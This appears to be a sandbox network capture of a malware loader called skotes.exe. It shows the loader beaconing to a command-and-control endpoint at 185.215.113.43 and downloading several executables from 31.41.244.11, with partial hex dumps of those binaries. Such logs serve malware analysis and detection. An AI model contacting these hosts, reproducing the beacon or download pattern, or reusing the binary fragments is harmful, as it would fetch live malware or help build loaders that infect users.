Dec 13, 2024 18:53:22.516424894 CET	1236	IN	Data Raw: fe 06 c7 00 00 06 73 dd 00 00 0a 28 14 00 00 2b 06 7b 3f 00 00 04 7b 38 00 00 04 02 fe 06 c5 00 00 06 73 de 00 00 0a 6f df 00 00 0a 2a 00 13 30 04 00 27 00 00 00 1a 00 00 11 d0 35 00 00 02 28 29 00 00 0a 17 8d 03 00 00 01 0a 06 16 02 a4 03 00 00 Data Ascii: s(+{?{8so0'5()o(01GG9G8(+G0 ()o0%s}G{F
Dec 13, 2024 18:53:22.638314962 CET	1236	IN	Data Raw: 01 00 0a 0b 02 fe 06 21 00 00 2b 73 43 01 00 0a 0c 02 7b 61 00 00 04 06 07 08 28 22 00 00 2b 0d 09 2a 13 30 03 00 34 00 00 00 24 00 00 11 02 7b 5e 00 00 04 6f 23 00 00 2b 02 7b 5f 00 00 04 02 7b 5d 00 00 04 73 44 01 00 0a 0a 02 7b 60 00 00 04 d0 Data Ascii: !+sC{a("+04${^o#+{_{]sD{`()oE0oHoIoJ0oKooL0oMoIoN

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49859	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:53:27.033195972 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 34 38 34 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1014844001&unit=246122658369
Dec 13, 2024 18:53:28.384562969 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:53:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49864	31.41.244.11	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:53:28.508913994 CET	59	OUT	GET /files/fate/random.exe HTTP/1.1 Host: 31.41.244.11
Dec 13, 2024 18:53:29.835027933 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:53:29 GMT Content-Type: application/octet-stream Content-Length: 727552 Last-Modified: Wed, 11 Dec 2024 08:22:24 GMT Connection: keep-alive ETag: "67594bc0-b1a00" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 c0 24 58 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 4e 01 00 00 a8 00 00 00 00 00 00 2c 36 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 0b 00 00 08 00 00 7c 7a 0b 00 03 00 40 83 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c ca 01 00 64 00 00 00 00 00 02 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 02 00 80 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 68 01 00 c0 00 00 00 00 00 00 00 00 00 00 00 34 cc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL$XgN,6@P\|z@ld8h4d.textAMN `.rdata<~`V@@.dataL@.rsrc@@.reloc@B.bss0@.bss@
Dec 13, 2024 18:53:29.835170031 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 13, 2024 18:53:29.835182905 CET	1236	IN	Data Raw: 89 c7 83 f8 0f 77 2c 90 89 7d c4 c7 45 c8 0f 00 00 00 57 ff 75 e0 8d 45 b4 50 e8 f4 36 00 00 83 c4 0c 01 ef 83 c7 b4 eb 77 66 2e 0f 1f 84 00 00 00 00 00 90 89 7d d8 83 cf 0f 83 ff 17 b9 16 00 00 00 0f 43 cf 81 ff ff 0f 00 00 c7 45 f0 01 00 00 00 Data Ascii: w,}EWuEP6wf.}CEMrA$PL#FfAP1u}}EEWuVx6E]5MMuEC]ry1tL1fDi[1i
Dec 13, 2024 18:53:29.835417032 CET	672	IN	Data Raw: 00 e8 39 01 00 00 8b 45 e0 83 c4 04 eb 22 90 89 4d dc ff 15 c4 cc 41 00 8b 4d e0 90 89 4d dc 50 68 2d 9f 41 00 e8 15 01 00 00 8b 45 e0 83 c4 08 90 89 45 dc ff 75 d4 e8 39 6f 00 00 8b 75 e0 83 c4 04 90 0f b6 84 35 c4 fe ff ff 8b 55 d0 00 c2 0f b6 Data Ascii: 9E"MAMMPh-AEEu9ou5U5U5MU0BU9UuUEd0^_[]fUeE@EMPhAWEMj
Dec 13, 2024 18:53:29.835438013 CET	1236	IN	Data Raw: 00 8b 40 18 a3 58 f0 41 00 68 62 2d a5 2f ff 35 58 f0 41 00 e8 d6 f7 ff ff 83 ec 14 0f 28 05 30 60 41 00 0f 11 44 24 04 89 1c 24 c7 44 24 18 00 00 00 00 c7 44 24 14 80 00 00 00 ff d0 83 f8 ff 0f 84 e4 02 00 00 89 c6 6a 00 50 ff 15 b8 cc 41 00 83 Data Ascii: @XAhb-/5XA(0`AD$$D$D$jPAP=EEjPW}WV0AVHAG<LMEEE1ffff.E(E@E;E"WEWEulH
Dec 13, 2024 18:53:29.835452080 CET	1236	IN	Data Raw: 90 ff 75 e0 e8 f8 67 00 00 83 c4 04 8b 45 e8 64 a3 00 00 00 00 83 c4 58 5e 5f 5b 5d c3 66 66 66 66 66 2e 0f 1f 84 00 00 00 00 00 55 83 ec 10 83 c5 0c 90 ff 75 e0 e8 5a 06 00 00 83 c4 04 83 c4 10 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 Data Ascii: ugEdX^_[]fffff.UuZ]USWV(eEEE"@dMdjAhQPAjEEEj@@EMEMQjPh @jjQ
Dec 13, 2024 18:53:29.835464954 CET	1236	IN	Data Raw: bd 01 00 00 83 c4 04 8b 45 f4 64 a3 00 00 00 00 eb 0a 90 8b 45 f4 64 a3 00 00 00 00 83 c4 14 5d c3 66 0f 1f 44 00 00 55 50 83 c5 00 90 ff 75 ec e8 8c 01 00 00 83 c4 04 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 14 90 8b Data Ascii: EdEd]fDUPu]USWVUeEEE@#@dMdUEEu)Ed1^_[]UPM]fffff.UPu]
Dec 13, 2024 18:53:29.835951090 CET	1236	IN	Data Raw: 00 00 83 c4 0c c6 04 1e 00 8b c7 5e eb 0f 53 ff 75 08 8b cf ff 75 fc 53 e8 93 04 00 00 5f 5b c9 c2 08 00 55 8b ec 8b 4d 08 83 c9 0f 56 3b 4d 10 77 1c 8b 75 0c 8b d6 8b 45 10 d1 ea 2b c2 3b f0 77 0c 8d 04 32 3b c8 0f 42 c8 8b c1 eb 03 8b 45 10 5e Data Ascii: ^SuuS_[UMV;MwuE+;w2;BE^]V~vF@P6YYfF^UQEVuxvPaA^UVuaA^]UVFD`APEYtjVYY^]U
Dec 13, 2024 18:53:29.835963964 CET	1236	IN	Data Raw: 8b 43 14 57 56 8d 3c 11 89 45 f4 50 57 e8 3d fb ff ff 8b f0 8d 4e 01 51 e8 bb 00 00 00 83 c4 10 89 45 fc 8b cb e8 5c f9 ff ff 83 7d f4 0f 8b 45 f8 8b 4d fc 89 7b 10 89 73 14 50 8d 3c 08 76 36 8b 33 56 51 e8 06 1c 00 00 8b 7d 14 8b 45 f8 03 45 fc Data Ascii: CWV<EPW=NQE\}EM{sP<v63VQ}EEWuPEE8E@PV; SQuVuW7E_^[UE=rEPEPEYYPuJYY]UEu]P=r
Dec 13, 2024 18:53:29.835975885 CET	1236	IN	Data Raw: 00 00 c3 50 64 ff 35 00 00 00 00 8d 44 24 0c 2b 64 24 0c 53 56 57 89 28 8b e8 a1 00 e6 41 00 33 c5 50 89 45 f0 ff 75 fc c7 45 fc ff ff ff ff 8d 45 f4 64 a3 00 00 00 00 c3 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5f 5e 5b 8b e5 5d 51 c3 8b 4d f0 33 cd Data Ascii: Pd5D$+d$SVW(A3PEuEEdMdY__^[]QM32Uju#YY]UQMi,uI(AP4A3UA3EVuAEu9F(tFPDAEF(F,3SW}u^(9FPDA
Dec 13, 2024 18:53:29.997560978 CET	1236	IN	Data Raw: fe ff ff ff b8 ff 00 00 00 e9 ef 00 00 00 68 28 ca 41 00 68 20 ca 41 00 e8 97 4a 00 00 59 59 c7 05 24 f5 41 00 02 00 00 00 eb 05 8a d9 88 5d e7 ff 75 dc e8 fe 01 00 00 59 e8 43 04 00 00 8b f0 33 ff 39 3e 74 1b 56 e8 24 01 00 00 59 84 c0 74 10 8b Data Ascii: h(Ah AJYY$A]uYC39>tV$Yt6WjWA!9>tVYt6O<YvG0WV0tku;jjYYE5MEQPLYYet2}u;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49876	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:53:34.353254080 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 34 38 37 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1014878001&unit=246122658369
Dec 13, 2024 18:53:35.697653055 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:53:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49877	31.41.244.11	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:53:35.822491884 CET	61	OUT	GET /files/encoxx/random.exe HTTP/1.1 Host: 31.41.244.11
Dec 13, 2024 18:53:37.158556938 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:53:36 GMT Content-Type: application/octet-stream Content-Length: 393728 Last-Modified: Thu, 12 Dec 2024 07:55:00 GMT Connection: keep-alive ETag: "675a96d4-60200" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d8 27 f3 e3 9c 46 9d b0 9c 46 9d b0 9c 46 9d b0 82 14 08 b0 85 46 9d b0 82 14 1e b0 e0 46 9d b0 82 14 19 b0 b6 46 9d b0 bb 80 e6 b0 95 46 9d b0 9c 46 9c b0 18 46 9d b0 82 14 17 b0 9d 46 9d b0 82 14 09 b0 9d 46 9d b0 82 14 0c b0 9d 46 9d b0 52 69 63 68 9c 46 9d b0 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 0c 66 a7 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 62 05 00 00 04 01 00 00 00 00 00 8f 51 00 00 00 10 00 00 00 80 05 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 b0 24 00 00 04 00 00 d1 cf 06 00 02 00 00 83 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$'FFFFFFFFFFFFRichFPELfebQ@$8gd0:-@.textab `.data`f@.rsrcz0<@@
Dec 13, 2024 18:53:37.158637047 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c 6d 05 00 00 00 00 00 88 69 05 00 9c 69 05 00 b4 69 05 00 c8 69 05 00 e2 69 05 Data Ascii: miiiiijj*jDjXjnjjjjjjjjk k6kRkhkpikkkkkkkll(l>lRlblvllllllll
Dec 13, 2024 18:53:37.158649921 CET	1236	IN	Data Raw: 69 6b 65 6c 79 20 74 68 65 20 72 65 73 75 6c 74 20 6f 66 20 63 61 6c 6c 69 6e 67 20 61 6e 20 4d 53 49 4c 2d 63 6f 6d 70 69 6c 65 64 20 28 2f 63 6c 72 29 20 66 75 6e 63 74 69 6f 6e 20 66 72 6f 6d 20 61 20 6e 61 74 69 76 65 20 63 6f 6e 73 74 72 75 Data Ascii: ikely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.R6032- not enough space for locale informationR6031- Attempt to initialize the CRT more than once.This indicates a bug in y
Dec 13, 2024 18:53:37.158906937 CET	1236	IN	Data Raw: 65 50 6f 69 6e 74 65 72 00 00 00 4b 00 45 00 52 00 4e 00 45 00 4c 00 33 00 32 00 2e 00 44 00 4c 00 4c 00 00 00 00 00 44 65 63 6f 64 65 50 6f 69 6e 74 65 72 00 00 00 46 6c 73 46 72 65 65 00 46 6c 73 53 65 74 56 61 6c 75 65 00 46 6c 73 47 65 74 56 Data Ascii: ePointerKERNEL32.DLLDecodePointerFlsFreeFlsSetValueFlsGetValueFlsAlloc.@@@Unknown exception/@@csm @z@z@ !"#$%&'()*+,-./0123456789:;<
Dec 13, 2024 18:53:37.158946037 CET	896	IN	Data Raw: 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 10 00 10 00 10 00 10 00 10 00 10 00 82 00 82 00 82 00 82 00 82 00 82 00 02 00 02 00 02 00 02 00 02 00 02 00 02 00 02 00 02 00 02 00 02 00 02 00 02 00 02 00 02 00 02 00 02 00 02 00 02 00 02 00 10 Data Ascii:
Dec 13, 2024 18:53:37.158960104 CET	1236	IN	Data Raw: 9d 9e 9f a0 a1 a2 a3 a4 a5 a6 a7 a8 a9 aa ab ac ad ae af b0 b1 b2 b3 b4 b5 b6 b7 b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7 c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7 d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7 e8 e9 ea eb ec ed ee Data Ascii: !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{\|}~
Dec 13, 2024 18:53:37.159302950 CET	1236	IN	Data Raw: 27 00 00 60 76 65 63 74 6f 72 20 76 62 61 73 65 20 63 6f 70 79 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 00 00 00 60 76 65 63 74 6f 72 20 63 6f 70 79 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 Data Ascii: '`vector vbase copy constructor iterator'`vector copy constructor iterator'`dynamic atexit destructor for '`dynamic initializer for '`eh vector vbase copy constructor iterator'`eh vector copy constructor iterator'`managed vec
Dec 13, 2024 18:53:37.159339905 CET	1236	IN	Data Raw: 00 00 00 60 2b 40 00 58 2b 40 00 4c 2b 40 00 40 2b 40 00 34 2b 40 00 28 2b 40 00 1c 2b 40 00 14 2b 40 00 08 2b 40 00 fc 2a 40 00 aa 1a 40 00 40 26 40 00 24 26 40 00 10 26 40 00 f0 25 40 00 d4 25 40 00 f4 2a 40 00 ec 2a 40 00 a8 1a 40 00 e8 2a 40 Data Ascii: `+@X+@L+@@+@4+@(+@+@+@+@@@@&@$&@&@%@%@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\|@x@t@p@l@h@d@`@\@X@T@P@L@@@4@,@
Dec 13, 2024 18:53:37.159353018 CET	672	IN	Data Raw: 8b ec b8 f8 15 00 00 e8 c3 ce 00 00 8b 45 08 8b 08 8b 50 04 a1 18 94 45 00 53 56 89 4d f4 8b 0d 1c 94 45 00 89 45 d4 57 8d 45 ec 89 55 e8 c7 45 ec 00 00 00 00 89 4d e0 e8 b2 ff ff ff 81 45 ec 3f 02 00 00 83 3d ec 0b 46 00 14 75 11 6a 00 6a 00 8d Data Ascii: EPESVMEEWEUEME?=FujjRL@ E$E=4@@EME EEuFu=uF@.=ujj@xFUEEEUU3=FF
Dec 13, 2024 18:53:37.159368992 CET	1236	IN	Data Raw: 00 6a 00 ff 15 98 10 40 00 56 e8 50 fd ff ff 83 c6 08 83 6d fc 01 75 b1 5f 5e 5b 8b e5 5d c3 51 68 70 ea 45 00 e8 15 15 00 00 83 c4 08 c3 cc 55 8b ec 64 a1 00 00 00 00 6a ff 68 28 61 45 00 50 b8 34 10 00 00 64 89 25 00 00 00 00 e8 de cb 00 00 53 Data Ascii: j@VPmu_^[]QhpEUdjh(aEP4d%SVW=t@33l@SN~F?\|=FSPSX@SSS8@SSSMQSSS@3E]fUSS](SSSSSSQ
Dec 13, 2024 18:53:37.278448105 CET	1236	IN	Data Raw: 4c 4c c7 85 48 ff ff ff f7 19 e2 27 c7 45 a4 b4 97 b7 44 c7 85 f0 fe ff ff 02 ce 85 17 c7 85 f8 fe ff ff 5d fd f9 60 c7 45 94 2c a6 ee 3f c7 85 6c fe ff ff e4 ca 0a 3a c7 85 0c ff ff ff ae 2c dd 5f c7 85 70 fe ff ff a6 c1 05 2f c7 85 c8 fe ff ff Data Ascii: LLH'ED]`E,?l:,_p/DD4tETo{7#E{"vQEXA/bEL\_MEhatRUAONT\XE~r=+ha%PTe

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49890	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:53:40.629466057 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 34 38 37 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1014879001&unit=246122658369
Dec 13, 2024 18:53:41.933686972 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:53:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.7	49895	31.41.244.11	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:53:42.057833910 CET	62	OUT	GET /files/unique2/random.exe HTTP/1.1 Host: 31.41.244.11
Dec 13, 2024 18:53:43.379663944 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:53:43 GMT Content-Type: application/octet-stream Content-Length: 1936384 Last-Modified: Fri, 13 Dec 2024 17:26:12 GMT Connection: keep-alive ETag: "675c6e34-1d8c00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 21 4a f8 9d 40 24 ab 9d 40 24 ab 9d 40 24 ab 83 12 a0 ab 81 40 24 ab 83 12 b1 ab 89 40 24 ab 83 12 a7 ab c5 40 24 ab ba 86 5f ab 94 40 24 ab 9d 40 25 ab f6 40 24 ab 83 12 ae ab 9c 40 24 ab 83 12 b0 ab 9c 40 24 ab 83 12 b5 ab 9c 40 24 ab 52 69 63 68 9d 40 24 ab 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 0c de dd 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 d4 02 00 00 b0 01 00 00 00 00 00 00 50 85 00 00 10 00 00 00 f0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 80 85 00 00 04 00 00 4f c3 1d 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$!J@$@$@$@$@$@$_@$@%@$@$@$@$Rich@$PELdP@OZBn@h!@ @T@.rsrch!@d@.idata B@ ( B@pbmurklfpjh@kltrprsa@d@.taggant0P"j@
Dec 13, 2024 18:53:43.379746914 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 13, 2024 18:53:43.379765987 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 13, 2024 18:53:43.379892111 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 13, 2024 18:53:43.379914045 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 13, 2024 18:53:43.379929066 CET	672	IN	Data Raw: a3 1a 4b ea c2 7a bb 27 df ff 57 d6 33 b4 4f 85 cb 9b ee 8d 4e d0 b6 d5 05 7e d1 9f f9 48 d3 6f 0c 2f cb 8a 80 1e 33 90 fd d2 ec a5 4b 09 c5 3f 85 fa b3 40 fd 43 a0 83 b6 64 28 84 5b 3f 47 5b 57 48 79 3b d9 86 3b a7 05 72 8d c5 8f 34 ec c2 a9 c8 Data Ascii: Kz'W3ON~Ho/3K?@Cd([?G[WHy;;r4m2\\2BZYJE@0Eip^7r6M=RmBhHgLyQ\8]L_WdswWC;:E6my(V&F>/V]#qt
Dec 13, 2024 18:53:43.380322933 CET	1236	IN	Data Raw: 5b b0 5f ab e8 18 0e 3f 5a 20 ca b7 b0 dc 97 46 29 58 0c f6 dc 86 f3 b2 4d 09 ef dd 45 7a 20 59 51 71 5c 3d 5b 5d 3b 65 61 7f 53 49 19 51 8e 2f 1c 42 cc 47 61 c4 f0 b3 12 41 94 27 1c d4 02 d5 bc 51 3e 5a d5 ee 1b d5 29 7b b6 b5 6d 5d ca e2 aa 4d Data Ascii: [_?Z F)XMEz YQq\=[];eaSIQ/BGaA'Q>Z){m]M<pbY9rh@!Wye4zcC7!Fz4b+x[?uESZaSPYV<^:9(2Ij$\\N#ZT0\|P:b] 0I7> Y
Dec 13, 2024 18:53:43.380354881 CET	1236	IN	Data Raw: 0a 80 2f b0 a5 d0 5d 27 a0 72 53 2b ae 89 c6 d7 ea be 52 a3 54 cc d8 d7 25 20 23 36 c7 f4 22 9f a3 10 26 4f 48 99 42 38 39 2d 0f 6a 9e 50 31 38 f1 b9 7e cc a9 e7 4a 41 60 33 b1 f2 53 60 ac 4c f2 61 b8 60 e2 d4 bb 3d 99 4f 3a 67 60 30 34 64 ac f7 Data Ascii: /]'rS+RT% #6"&OHB89-jP18~JA`3S`La`=O:g`04dmknHG=\|2Nws~U5w>?y$EtL"0X4PL1WR,s36Tz//vNHRj>ISIML@`7{;}IQnK,IwZ+
Dec 13, 2024 18:53:43.380367041 CET	1236	IN	Data Raw: e6 75 7c 3b 76 93 a8 38 dd a9 3b 8f 85 98 5f c9 0f 51 1e 31 a7 76 1c 82 b9 4d 7f 65 82 09 26 af 9c 5c 1c 79 04 34 bb 4b 52 3d 1d 2d 10 5d 2b f1 69 cb 85 d6 4b 97 cf 8f e2 0e 2b 2e 66 a1 cd 33 0a 61 f9 e7 bc 82 53 79 c8 b9 81 ba c9 70 3f b7 46 c1 Data Ascii: u\|;v8;_Q1vMe&\y4KR=-]+iK+.f3aSyp?FW)PRjj#zzg42?e8S\18SK#6RHuRPk%g0;">Q15&CQiI2>2Eg9xC>1 " $7aQ3(:z
Dec 13, 2024 18:53:43.380764961 CET	1236	IN	Data Raw: 11 59 ea 03 75 1b 01 da 15 b2 33 7c 94 37 6e 12 41 fd 2f 09 5a 3f 3b 1e 44 dd 2a bb 5a 7e a7 26 1a 70 bb 98 93 07 69 95 58 e3 1d 42 d2 10 85 e6 94 6e 7b 37 e7 1c 3e e2 78 54 1a 5a 08 46 83 12 78 58 7f c4 cc 28 b7 b3 72 30 eb 3c 5c 72 53 1f 54 11 Data Ascii: Yu3\|7nA/Z?;D*Z~&piXBn{7>xTZFxX(r0<\rST3d$H!uDQ"dE'e!x\|\|xBC2F^H2s8cV[FVyUcUO]D_-k:k85UlA.VFZy2zY$2 \|nQ(VV}Ht
Dec 13, 2024 18:53:43.500008106 CET	1236	IN	Data Raw: b8 bf 3d c4 16 24 f9 f0 77 28 c6 23 f8 3d 4d 05 74 e3 d9 af 70 9b e6 1c 8a 38 ae c9 99 52 50 02 a2 64 37 88 04 59 fb 3b 50 22 50 7b cb 24 3c 2b 07 26 f9 ed 0b 0b 72 68 f0 40 e8 6f 1a 82 c5 8f 45 0f 6e 40 81 68 e0 b4 3a e2 69 e2 ca f8 34 6f 09 98 Data Ascii: =$w(#=Mtp8RPd7Y;P"P{$<+&rh@oEn@h:i4ocX)cw; 6~%+X\m!&B]/ulAmQ1FB@+QU_mw'cP[.4Jy^FQU$Op7C4:X~$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.7	49915	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:53:49.239614010 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 34 38 38 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1014880001&unit=246122658369
Dec 13, 2024 18:53:50.584038019 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:53:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
